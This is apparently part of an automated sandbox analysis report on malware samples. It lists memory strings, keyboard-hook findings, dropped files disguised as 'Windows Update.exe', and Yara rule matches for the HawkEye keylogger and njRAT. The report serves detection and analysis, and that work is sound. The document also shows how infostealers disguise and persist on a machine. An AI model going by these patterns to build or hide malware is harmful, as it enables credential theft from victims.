9g1;~oref=https%3A%2F%2Fwww.google.com%2Fchrome%2F?https://2542116.fls.doubleclick.net/activityi;src=2542116;type=2542116;cat=chom0;ord=4476872748356;gtm=2wg9g1;~oref=https%3A%2F%2Fwww.google.com%2Fchrome%2Fhttps://2542116.fls.doubleclick.net/activityi;src=2542116;type=clien612;cat=chromx;ord=1;num=1463674499004;gtm=2wg9g1;~oref=https%3A%2F%2Fwww.google.com%2Fchrome%2Fthank-you.html%3Fstatcb%3D0%26installdataindex%3Dempty%26defaultbrowser%3D0?https://2542116.fls.doubleclick.net/activityi;src=2542116;type=clien612;cat=chromx;ord=1;num=1463674499004;gtm=2wg9g1;~oref=https%3A%2F%2Fwww.google.com%2Fchrome%2Fthank-you.html%3Fstatcb%3D0%26installdataindex%3Dempty%26defaultbrowser%3D0https://2542116.fls.doubleclick.net/activityi;src=2542116;type=chrom322;cat=chrom01g;ord=6856811916691;gtm=2wg9g1;~oref=https%3A%2F%2Fwww.google.com%2Fchrome%2F?https://2542116.fls.doubleclick.net/activityi;src=2542116;type=chrom322;cat=chrom01g;ord=6856811916691;gtm=2wg9g1;~oref=https%3A%2F%2Fwww.google.com%2Fchrome%2Fabout:blankhttps://adservice.google.co.uk/ddm/fls/i/src=2542116;type=chrom322;cat=chrom01g;ord=6856811916691;gtm=2wg9g1;~oref=https%3A%2F%2Fwww.google.com%2Fchrome%2Fhttps://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&ct=1601452923&rver=6.0.5286.0&wp=MBI_SSL&wreply=https:%2F%2fwww.bing.com%2Fsecure%2FPassport.aspx%3Fpopup%3D1%26ssl%3D1&lc=2055&id=264960&checkda=1https://login.live.com/login.srfhttps://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBI57XIG&prvid=77%2C184%2C188%2C226&rtime=1&https=1&usp_status=0&usp_consent=1&dcfp=gdpr,usphttps://contextual.media.net/checksync.phphttps://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBI57XIG&prvid=77%2C184%2C188%2C226&rtime=4&https=1&usp_status=0&usp_co
                  Source: vbc.exe, 0000001C.00000003.409624926.0000000002264000.00000004.00000001.sdmpString found in binary or memory: https://www.microsoft.com/en-us/welcomeie11/https://www.microsoft.com/en-us/edge?form=MA13DL&OCID=MA13DLhttps://www.microsoft.com/en-us/edgehttps://www.microsoft.com/edge/?form=MA13DL&OCID=MA13DLhttps://www.microsoft.com/edge/https://www.microsoft.com/en-us/edge/?form=MA13DL&OCID=MA13DLhttps://www.microsoft.com/en-us/edge/https://www.google.com/chrome/https://www.google.com/chrome/thank-you.html?statcb=0&installdataindex=empty&defaultbrowser=0https://www.google.com/chrome/thank-you.htmlhttps://www.bing.com/search?q=chrome+download&src=IE-SearchBox&FORM=IESR4A&pc=EUPP_https://www.bing.com/searchhttps://go.microsoft.com/fwlink/?LinkId=838604https://go.microsoft.com/fwlink/https://go.microsoft.com/fwlink/p/?LinkId=255141https://go.microsoft.com/fwlink/p/https://go.microsoft.com/fwlink/?LinkId=517287res://C:\Windows\system32\mmcndmgr.dll/views.htmhttp://www.msn.com/?ocid=iehphttp://www.msn.com/http://www.msn.com/de-ch/?ocid=iehphttp://www.msn.com/de-ch/http://go.microsoft.com/fwlink/?LinkId=838604http://go.microsoft.com/fwlink/http://go.microsoft.com/fwlink/p/?LinkId=255141http://go.microsoft.com/fwlink/p/https://2542116.fls.doubleclick.net/activityi;src=2542116;type=2542116;cat=chom0;ord=4476872748356;gtm=2wg9g1;~oref=https%3A%2F%2Fwww.google.com%2Fchrome%2F?https://2542116.fls.doubleclick.net/activityi;src=2542116;type=2542116;cat=chom0;ord=4476872748356;gtm=2wg9g1;~oref=https%3A%2F%2Fwww.google.com%2Fchrome%2Fhttps://2542116.fls.doubleclick.net/activityi;src=2542116;type=clien612;cat=chromx;ord=1;num=1463674499004;gtm=2wg9g1;~oref=https%3A%2F%2Fwww.google.com%2Fchrome%2Fthank-you.html%3Fstatcb%3D0%26installdataindex%3Dempty%26defaultbrowser%3D0?https://2542116.fls.doubleclick.net/activityi;src=2542116;type=clien612;cat=chromx;ord=1;num=1463674499004;gtm=2wg9g1;~oref=https%3A%2F%2Fwww.google.com%2Fchrome%2Fthank-you.html%3Fstatcb%3D0%26installdataindex%3Dempty%26defaultbrowser%3D0https://2542116.fls.doubleclick.net/activityi;src=2542116;type=chrom322;cat=chrom01g;ord=6856811916691;gtm=2wg9g1;~oref=https%3A%2F%2Fwww.google.com%2Fchrome%2F?https://2542116.fls.doubleclick.net/activityi;src=2542116;type=chrom322;cat=chrom01g;ord=6856811916691;gtm=2wg9g1;~oref=https%3A%2F%2Fwww.google.com%2Fchrome%2Fabout:blankhttps://adservice.google.co.uk/ddm/fls/i/src=2542116;type=chrom322;cat=chrom01g;ord=6856811916691;gtm=2wg9g1;~oref=https%3A%2F%2Fwww.google.com%2Fchrome%2Fhttps://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&ct=1601452923&rver=6.0.5286.0&wp=MBI_SSL&wreply=https:%2F%2fwww.bing.com%2Fsecure%2FPassport.aspx%3Fpopup%3D1%26ssl%3D1&lc=2055&id=264960&checkda=1https://login.live.com/login.srfhttps://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBI57XIG&prvid=77%2C184%2C188%2C226&rtime=1&https=1&usp_status=0&usp_consent=1&dcfp=gdpr,usphttps://contextual.media.net/checksync.phphttps://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBI57XIG&prvid=77%2C184%2C188%2C226&rtime=4&https=1&usp_status=0&usp_co
                  Source: vbc.exe, 0000001C.00000003.409624926.0000000002264000.00000004.00000001.sdmpString found in binary or memory: https://www.microsoft.com/en-us/welcomeie11/https://www.microsoft.com/en-us/edge?form=MA13DL&OCID=MA13DLhttps://www.microsoft.com/en-us/edgehttps://www.microsoft.com/edge/?form=MA13DL&OCID=MA13DLhttps://www.microsoft.com/edge/https://www.microsoft.com/en-us/edge/?form=MA13DL&OCID=MA13DLhttps://www.microsoft.com/en-us/edge/https://www.google.com/chrome/https://www.google.com/chrome/thank-you.html?statcb=0&installdataindex=empty&defaultbrowser=0https://www.google.com/chrome/thank-you.htmlhttps://www.bing.com/search?q=chrome+download&src=IE-SearchBox&FORM=IESR4A&pc=EUPP_https://www.bing.com/searchhttps://go.microsoft.com/fwlink/?LinkId=838604https://go.microsoft.com/fwlink/https://go.microsoft.com/fwlink/p/?LinkId=255141https://go.microsoft.com/fwlink/p/https://go.microsoft.com/fwlink/?LinkId=517287res://C:\Windows\system32\mmcndmgr.dll/views.htmhttp://www.msn.com/?ocid=iehphttp://www.msn.com/http://www.msn.com/de-ch/?ocid=iehphttp://www.msn.com/de-ch/http://go.microsoft.com/fwlink/?LinkId=838604http://go.microsoft.com/fwlink/http://go.microsoft.com/fwlink/p/?LinkId=255141http://go.microsoft.com/fwlink/p/https://2542116.fls.doubleclick.net/activityi;src=2542116;type=2542116;cat=chom0;ord=4476872748356;gtm=2wg9g1;~oref=https%3A%2F%2Fwww.google.com%2Fchrome%2F?https://2542116.fls.doubleclick.net/activityi;src=2542116;type=2542116;cat=chom0;ord=4476872748356;gtm=2wg9g1;~oref=https%3A%2F%2Fwww.google.com%2Fchrome%2Fhttps://2542116.fls.doubleclick.net/activityi;src=2542116;type=clien612;cat=chromx;ord=1;num=1463674499004;gtm=2wg9g1;~oref=https%3A%2F%2Fwww.google.com%2Fchrome%2Fthank-you.html%3Fstatcb%3D0%26installdataindex%3Dempty%26defaultbrowser%3D0?https://2542116.fls.doubleclick.net/activityi;src=2542116;type=clien612;cat=chromx;ord=1;num=1463674499004;gtm=2wg9g1;~oref=https%3A%2F%2Fwww.google.com%2Fchrome%2Fthank-you.html%3Fstatcb%3D0%26installdataindex%3Dempty%26defaultbrowser%3D0https://2542116.fls.doubleclick.net/activityi;src=2542116;type=chrom322;cat=chrom01g;ord=6856811916691;gtm=2wg9g1;~oref=https%3A%2F%2Fwww.google.com%2Fchrome%2F?https://2542116.fls.doubleclick.net/activityi;src=2542116;type=chrom322;cat=chrom01g;ord=6856811916691;gtm=2wg9g1;~oref=https%3A%2F%2Fwww.google.com%2Fchrome%2Fabout:blankhttps://adservice.google.co.uk/ddm/fls/i/src=2542116;type=chrom322;cat=chrom01g;ord=6856811916691;gtm=2wg9g1;~oref=https%3A%2F%2Fwww.google.com%2Fchrome%2Fhttps://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&ct=1601452923&rver=6.0.5286.0&wp=MBI_SSL&wreply=https:%2F%2fwww.bing.com%2Fsecure%2FPassport.aspx%3Fpopup%3D1%26ssl%3D1&lc=2055&id=264960&checkda=1https://login.live.com/login.srfhttps://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBI57XIG&prvid=77%2C184%2C188%2C226&rtime=1&https=1&usp_status=0&usp_consent=1&dcfp=gdpr,usphttps://contextual.media.net/checksync.phphttps://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBI57XIG&prvid=77%2C184%2C188%2C226&rtime=4&https=1&usp_status=0&usp_co

                  Key, Mouse, Clipboard, Microphone and Screen Capturing:

                  barindex
                  Yara detected HawkEye KeyloggerShow sources
                  Source: Yara matchFile source: 2.2.Keylogger.exe.7bfa72.3.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 2.2.Keylogger.exe.768208.2.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 17.0.Windows Update.exe.d48208.6.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 17.0.Windows Update.exe.d9fa72.13.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 2.0.Keylogger.exe.768208.3.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 17.3.Windows Update.exe.6e1b39a.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 2.3.Keylogger.exe.eb4e92.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 17.0.Windows Update.exe.d9fa72.5.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 17.0.Windows Update.exe.d48208.14.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 17.0.Windows Update.exe.d48208.10.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 17.2.Windows Update.exe.d48208.2.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 17.0.Windows Update.exe.d49c0d.7.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 2.0.Keylogger.exe.7bfa72.2.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 17.0.Windows Update.exe.d40000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 17.2.Windows Update.exe.d49c0d.3.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 2.2.Keylogger.exe.769c0d.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 17.0.Windows Update.exe.d40000.8.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 17.2.Windows Update.exe.d40000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 17.2.Windows Update.exe.d9fa72.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 2.0.Keylogger.exe.760000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 17.0.Windows Update.exe.d48208.2.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 17.0.Windows Update.exe.d49c0d.15.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 17.0.Windows Update.exe.d9fa72.3.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 17.0.Windows Update.exe.d9fa72.9.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 17.0.Windows Update.exe.d49c0d.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 17.0.Windows Update.exe.d49c0d.11.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 17.0.Windows Update.exe.d40000.4.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 2.0.Keylogger.exe.769c0d.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 17.0.Windows Update.exe.d40000.12.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 2.2.Keylogger.exe.760000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 17.2.Windows Update.exe.33faa98.4.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000011.00000002.401046205.000000000384C000.00000004.00000001.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000028.00000002.461183087.0000000000B02000.00000002.00020000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000021.00000002.442088450.0000000000BC2000.00000002.00020000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000028.00000000.452870911.0000000000B02000.00000002.00020000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000011.00000002.401022146.0000000003844000.00000004.00000001.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000023.00000002.517639660.0000000000D72000.00000002.00020000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000011.00000002.398362779.00000000033D1000.00000004.00000001.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000023.00000000.438271647.0000000000D72000.00000002.00020000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000011.00000000.344079662.0000000000D42000.00000002.00020000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000011.00000000.345013885.0000000000D42000.00000002.00020000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000023.00000000.439141750.0000000000D72000.00000002.00020000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000011.00000002.395985311.0000000000D42000.00000002.00020000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000002.00000002.345938091.0000000000762000.00000002.00020000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000011.00000000.344577031.0000000000D42000.00000002.00020000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000021.00000000.418565410.0000000000BC2000.00000002.00020000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000011.00000003.370310625.0000000006DFE000.00000004.00000001.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000023.00000000.439708948.0000000000D72000.00000002.00020000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000023.00000000.437787976.0000000000D72000.00000002.00020000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000021.00000002.445241123.00000000013F3000.00000004.00000020.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000002.00000000.314643771.0000000000762000.00000002.00020000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000002.00000003.339296284.0000000000E97000.00000004.00000001.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000023.00000002.521512355.00000000036C1000.00000004.00000001.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000011.00000000.343560898.0000000000D42000.00000002.00020000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: Keylogger.exe PID: 4492, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: Windows Update.exe PID: 5624, type: MEMORYSTR
                  Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\Keylogger.exe, type: DROPPED
                  Source: Yara matchFile source: C:\Users\user\AppData\Roaming\Windows Update.exe, type: DROPPED
                  Source: Yara matchFile source: C:\Users\user\AppData\Roaming\WindowsUpdate.exe, type: DROPPED
                  Installs a global keyboard hookShow sources
                  Source: C:\Users\user\AppData\Roaming\Windows Update.exeWindows user hook set: 0 keyboard low level C:\Users\user\AppData\Roaming\Windows Update.exe
                  Contains functionality to log keystrokes (.Net Source)Show sources
                  Source: Keylogger.exe.0.dr, Form1.cs.Net Code: HookKeyboard
                  Source: Windows Update.exe.2.dr, Form1.cs.Net Code: HookKeyboard
                  Source: 2.0.Keylogger.exe.760000.0.unpack, Form1.cs.Net Code: HookKeyboard
                  Source: 2.2.Keylogger.exe.760000.0.unpack, Form1.cs.Net Code: HookKeyboard
                  Source: WindowsUpdate.exe.17.dr, Form1.cs.Net Code: HookKeyboard
                  Source: 17.0.Windows Update.exe.d40000.8.unpack, Form1.cs.Net Code: HookKeyboard
                  Source: 17.2.Windows Update.exe.d40000.0.unpack, Form1.cs.Net Code: HookKeyboard
                  Source: 17.0.Windows Update.exe.d40000.0.unpack, Form1.cs.Net Code: HookKeyboard
                  Source: 17.0.Windows Update.exe.d40000.12.unpack, Form1.cs.Net Code: HookKeyboard
                  Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 28_2_0040D674 OpenClipboard,GetLastError,DeleteFileW,
                  Source: ViRuS.exe, 00000008.00000002.329640367.000000000074A000.00000004.00000020.sdmpBinary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>
                  Source: C:\Users\user\AppData\Local\Temp\hhzclipper.exeWindow created: window name: CLIPBRDWNDCLASS
                  Source: C:\Users\user\AppData\Roaming\Windows Update.exeWindow created: window name: CLIPBRDWNDCLASS

                  E-Banking Fraud:

                  barindex
                  Yara detected NjratShow sources
                  Source: Yara matchFile source: 4.2.RedLine.MainPanel-cracked.exe.2ad9310.4.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 5.2.RedLine.MainPanel-cracked.exe.2886bc0.3.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 5.2.RedLine.MainPanel-cracked.exe.24b0000.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 4.2.RedLine.MainPanel-cracked.exe.2630000.1.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 4.2.RedLine.MainPanel-cracked.exe.2ae6bc0.2.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 16.2.RedLine.exe.2a99190.3.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 16.2.RedLine.exe.2a99190.3.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 16.2.RedLine.exe.2aa6b58.2.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 5.2.RedLine.MainPanel-cracked.exe.24b0000.1.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 4.2.RedLine.MainPanel-cracked.exe.2ad9310.4.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 5.2.RedLine.MainPanel-cracked.exe.2879310.2.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 5.2.RedLine.MainPanel-cracked.exe.2886cd8.4.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 5.2.RedLine.MainPanel-cracked.exe.2879310.2.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 16.2.RedLine.exe.2700000.1.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 4.2.RedLine.MainPanel-cracked.exe.2630000.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 4.2.RedLine.MainPanel-cracked.exe.2ae6cd8.3.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 16.2.RedLine.exe.2aa6a40.4.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 16.2.RedLine.exe.2700000.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0000002A.00000002.490818765.0000000002EA1000.00000004.00000001.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000022.00000002.460848822.0000000002831000.00000004.00000001.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000004.00000002.344112668.0000000002630000.00000004.00020000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000010.00000002.569953826.0000000002A81000.00000004.00000001.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000004.00000002.344202284.0000000002AC1000.00000004.00000001.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000002A.00000002.490487625.0000000002AD0000.00000004.00020000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000022.00000002.460388443.00000000008F0000.00000004.00020000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000005.00000002.339955429.0000000002861000.00000004.00000001.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000005.00000002.339619983.00000000024B0000.00000004.00020000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000001E.00000002.421069475.0000000002C51000.00000004.00000001.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000001E.00000002.420830260.0000000002620000.00000004.00020000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000010.00000002.569803952.0000000002700000.00000004.00020000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: RedLine.MainPanel-cracked.exe PID: 4140, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: RedLine.MainPanel-cracked.exe PID: 7032, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: RedLine.exe PID: 4236, type: MEMORYSTR

                  System Summary:

                  barindex
                  Malicious sample detected (through community Yara rule)Show sources
                  Source: 4.2.RedLine.MainPanel-cracked.exe.2ad9310.4.raw.unpack, type: UNPACKEDPEMatched rule: Identify njRat Author: Brian Wallace @botnet_hunter
                  Source: 4.2.RedLine.MainPanel-cracked.exe.2ad9310.4.raw.unpack, type: UNPACKEDPEMatched rule: detect njRAT in memory Author: JPCERT/CC Incident Response Group
                  Source: 5.2.RedLine.MainPanel-cracked.exe.2886bc0.3.raw.unpack, type: UNPACKEDPEMatched rule: Identify njRat Author: Brian Wallace @botnet_hunter
                  Source: 5.2.RedLine.MainPanel-cracked.exe.2886bc0.3.raw.unpack, type: UNPACKEDPEMatched rule: detect njRAT in memory Author: JPCERT/CC Incident Response Group
                  Source: 5.2.RedLine.MainPanel-cracked.exe.24b0000.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects malware from disclosed CN malware set Author: Florian Roth
                  Source: 5.2.RedLine.MainPanel-cracked.exe.24b0000.1.raw.unpack, type: UNPACKEDPEMatched rule: Identify njRat Author: Brian Wallace @botnet_hunter
                  Source: 5.2.RedLine.MainPanel-cracked.exe.24b0000.1.raw.unpack, type: UNPACKEDPEMatched rule: detect njRAT in memory Author: JPCERT/CC Incident Response Group
                  Source: 4.2.RedLine.MainPanel-cracked.exe.2630000.1.unpack, type: UNPACKEDPEMatched rule: Detects malware from disclosed CN malware set Author: Florian Roth
                  Source: 4.2.RedLine.MainPanel-cracked.exe.2630000.1.unpack, type: UNPACKEDPEMatched rule: Identify njRat Author: Brian Wallace @botnet_hunter
                  Source: 4.2.RedLine.MainPanel-cracked.exe.2630000.1.unpack, type: UNPACKEDPEMatched rule: detect njRAT in memory Author: JPCERT/CC Incident Response Group
                  Source: 4.2.RedLine.MainPanel-cracked.exe.2ae6bc0.2.raw.unpack, type: UNPACKEDPEMatched rule: Identify njRat Author: Brian Wallace @botnet_hunter
                  Source: 4.2.RedLine.MainPanel-cracked.exe.2ae6bc0.2.raw.unpack, type: UNPACKEDPEMatched rule: detect njRAT in memory Author: JPCERT/CC Incident Response Group
                  Source: 2.2.Keylogger.exe.7bfa72.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                  Source: 2.2.Keylogger.exe.7bfa72.3.raw.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                  Source: 2.2.Keylogger.exe.768208.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                  Source: 2.2.Keylogger.exe.768208.2.raw.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                  Source: 17.0.Windows Update.exe.d48208.6.raw.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                  Source: 17.0.Windows Update.exe.d48208.6.raw.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                  Source: 17.0.Windows Update.exe.d9fa72.13.raw.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                  Source: 17.0.Windows Update.exe.d9fa72.13.raw.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                  Source: 2.0.Keylogger.exe.768208.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                  Source: 2.0.Keylogger.exe.768208.3.raw.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                  Source: 17.3.Windows Update.exe.6e1b39a.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                  Source: 17.3.Windows Update.exe.6e1b39a.0.raw.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                  Source: 16.2.RedLine.exe.2a99190.3.unpack, type: UNPACKEDPEMatched rule: Detects malware from disclosed CN malware set Author: Florian Roth
                  Source: 16.2.RedLine.exe.2a99190.3.unpack, type: UNPACKEDPEMatched rule: Identify njRat Author: Brian Wallace @botnet_hunter
                  Source: 16.2.RedLine.exe.2a99190.3.unpack, type: UNPACKEDPEMatched rule: detect njRAT in memory Author: JPCERT/CC Incident Response Group
                  Source: 2.3.Keylogger.exe.eb4e92.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                  Source: 2.3.Keylogger.exe.eb4e92.0.raw.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                  Source: 16.2.RedLine.exe.2a99190.3.raw.unpack, type: UNPACKEDPEMatched rule: Identify njRat Author: Brian Wallace @botnet_hunter
                  Source: 16.2.RedLine.exe.2a99190.3.raw.unpack, type: UNPACKEDPEMatched rule: detect njRAT in memory Author: JPCERT/CC Incident Response Group
                  Source: 17.0.Windows Update.exe.d9fa72.5.raw.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                  Source: 17.0.Windows Update.exe.d9fa72.5.raw.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                  Source: 17.0.Windows Update.exe.d48208.14.raw.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                  Source: 17.0.Windows Update.exe.d48208.14.raw.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                  Source: 16.2.RedLine.exe.2aa6b58.2.raw.unpack, type: UNPACKEDPEMatched rule: Identify njRat Author: Brian Wallace @botnet_hunter
                  Source: 16.2.RedLine.exe.2aa6b58.2.raw.unpack, type: UNPACKEDPEMatched rule: detect njRAT in memory Author: JPCERT/CC Incident Response Group
                  Source: 17.0.Windows Update.exe.d48208.10.raw.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                  Source: 17.0.Windows Update.exe.d48208.10.raw.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                  Source: 17.2.Windows Update.exe.d48208.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                  Source: 17.2.Windows Update.exe.d48208.2.raw.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                  Source: 17.0.Windows Update.exe.d49c0d.7.raw.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                  Source: 17.0.Windows Update.exe.d49c0d.7.raw.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                  Source: 5.2.RedLine.MainPanel-cracked.exe.24b0000.1.unpack, type: UNPACKEDPEMatched rule: Detects malware from disclosed CN malware set Author: Florian Roth
                  Source: 5.2.RedLine.MainPanel-cracked.exe.24b0000.1.unpack, type: UNPACKEDPEMatched rule: Identify njRat Author: Brian Wallace @botnet_hunter
                  Source: 5.2.RedLine.MainPanel-cracked.exe.24b0000.1.unpack, type: UNPACKEDPEMatched rule: detect njRAT in memory Author: JPCERT/CC Incident Response Group
                  Source: 2.0.Keylogger.exe.7bfa72.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                  Source: 2.0.Keylogger.exe.7bfa72.2.raw.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                  Source: 17.0.Windows Update.exe.d40000.0.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                  Source: 17.0.Windows Update.exe.d40000.0.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                  Source: 4.2.RedLine.MainPanel-cracked.exe.2ad9310.4.unpack, type: UNPACKEDPEMatched rule: Detects malware from disclosed CN malware set Author: Florian Roth
                  Source: 4.2.RedLine.MainPanel-cracked.exe.2ad9310.4.unpack, type: UNPACKEDPEMatched rule: Identify njRat Author: Brian Wallace @botnet_hunter
